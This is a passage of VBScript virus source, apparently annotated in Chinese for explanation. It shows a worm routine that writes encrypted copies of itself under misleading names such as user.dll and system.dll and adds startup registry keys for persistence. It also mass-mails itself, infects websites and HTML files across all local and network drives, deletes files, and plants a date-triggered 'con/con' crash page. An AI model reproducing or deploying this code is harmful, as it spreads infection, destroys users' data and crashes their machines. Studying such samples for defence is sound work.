end if end sub function geterr() 忽略错误 if err.number<>0 then geterr=true err.clear else geterr=false end if end function
sub executepage() 'web 页状态时的程序
on error resume next
dim html_str, adi, wdf, wdf2,wdf3,wdsf, wdsf2, vf
vbs_str = getscriptcode("vbscript") '得到 vbscript 代码
js_str = getjavascript() ' 得到 javascript 代码
code_str = makescript(encrypt(vbs_str),true) '得到已加密过的脚本代码
html_str = makehtml(encrypt(vbs_str), true) '得到已加密的完整html代码
gf
'定义病毒文件的路径
wdsf = w2 & "mdm.vbs"
wdsf2 = w1 & "profile.vbs"
wdf = w2 & "user.dll" ' 注意 wdf 和 wdf3 两个文件非常迷惑人
wdf2 = w2 & "readme.html"
wdf3 = w2 & "system.dll"
'创建病毒文件
set vf = fso.opentextfile (wdf, 2, true)
vf.write vbs_str
vf.close
set vf = fso.opentextfile (wdsf, 2, true)
vf.write vbs_str
vf.close
set vf = fso.opentextfile (wdsf2, 2, true)
vf.write vbs_str
vf.close
set vf = fso.opentextfile (wdf2, 2, true)
vf.write html_str
vf.close
set vf = fso.opentextfile (wdf3, 2, true)
vf.write code_str
vf.close
修改注册表,让病毒文件在每一次计算机启动自动执行
writereg mswkey & "currentversion\run\mdm", wdsf, ""
writereg mswkey & "currentversion\runservices\profile", wdsf2, ""
sendmail ' 执行发送邮件程序
hackpage ' 执行感染网站程序
set adi = fso.drives
for each x in adi
if x.drivestype = 2 or x.drivestype = 3 then '遍历所有本地硬盘和网络共享硬盘
call searchhtml(x & "\") '执行文件感染程序
end if
next
if testuser then '检查用戶
killhe 执行删除文件操作
else
if month(date) & day(date) = "75" then '如系统时间为 7月5日
set vf = fso.opentextfile(w2 & "75.htm", 2,true) ’创建系统攻击文件
vf.write makescript ("window.navigate ('c:/con/con');", false)
vf.close
writereg mswkey & "currentversion\run\75", w2 & "75.htm", "" '自动启动
